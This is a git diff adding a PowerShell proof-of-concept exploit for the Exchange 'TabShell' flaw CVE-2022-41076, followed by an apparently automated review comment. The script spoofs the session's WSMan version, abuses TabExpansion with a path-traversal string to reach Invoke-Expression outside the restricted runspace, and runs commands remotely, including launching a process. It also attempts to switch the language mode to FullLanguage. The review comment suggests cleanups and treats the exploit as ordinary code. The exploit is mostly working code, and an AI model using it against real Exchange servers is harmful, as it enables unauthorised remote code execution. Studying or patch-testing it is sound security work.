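--- a/TabShell_CVE-2022-41076_poc.ps1
+++ b/TabShell_CVE-2022-41076_poc.ps1
@@ -0,0 +1,31 @@
+$secureString = ConvertTo-SecureString -String "Pwd" -AsPlainText -Force
+$UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "lab\john", $secureString
+$version = New-Object -TypeName System.Version -ArgumentList "2.0"
+$mytable = $PSversionTable
+$mytable["WSManStackVersion"] = $version
+$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments @{PSversionTable=$mytable}
+$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://exchange.lab.local/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption
+
+
+Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ";../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression" -lastWord "-test" }
+
+
+Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[System.Security.Principal.WindowsIdentity]::GetCurrent().Name" }
+
+Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[Diagnostics.Process]::Start('mspaint.exe')" }
+
+Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "(new-object System.Diagnostics.Process)::Start('mspaint.exe')" }
+
+invoke-expression "`$ExecutionContext.SessionState.LanguageMode"
+
+invoke-expression "`$ExecutionContext.SessionState.LanguageMode='FullLanguage'"
+
+
+$ps = new-object System.Diagnostics.Process
+$ps.StartInfo.Filename = "ipconfig.exe"
+$ps.StartInfo.Arguments = " /all"
+$ps.StartInfo.RedirectStandardOutput = $True
+$ps.StartInfo.UseShellExecute = $false
+$ps.start()
+$ps.WaitForExit()
+[string] $Out = $ps.StandardOutput.ReadToEnd();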
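Review bot: The script embeds a plaintext password and account (`"Pwd"`, `"lab\john"`) on lines 1–2 and never tears down the session it opens on line 7, so a `$UserCredential = Get-Credential` prompt and a closing `Remove-PSSession $Session` would keep lab credentials out of the repository and stop leaving the remote runspace open after each run. Line 4 `$mytable = $PSversionTable` aliases the live hashtable rather than copying it, so the assignment on line 5 also rewrites the client session's own `$PSVersionTable`, which is worth a comment because it changes the local environment for everything run afterwards. Lines 19–31 (`invoke-expression "`$ExecutionContext..."` onward and the `System.Diagnostics.Process` block) are not wrapped in `Invoke-Command`, so they run on the operator's host rather than in `$Session`, and `$Out` is assigned on line 31 but never emitted; if they are meant as a local sanity check, a comment saying so would save the next reader from assuming they exercise the server. The file has no header; one stating what a patched Exchange server is expected to return for the line 10 call (so the script doubles as a regression check for the fix of CVE-2022-41076) would make it useful to defenders as well.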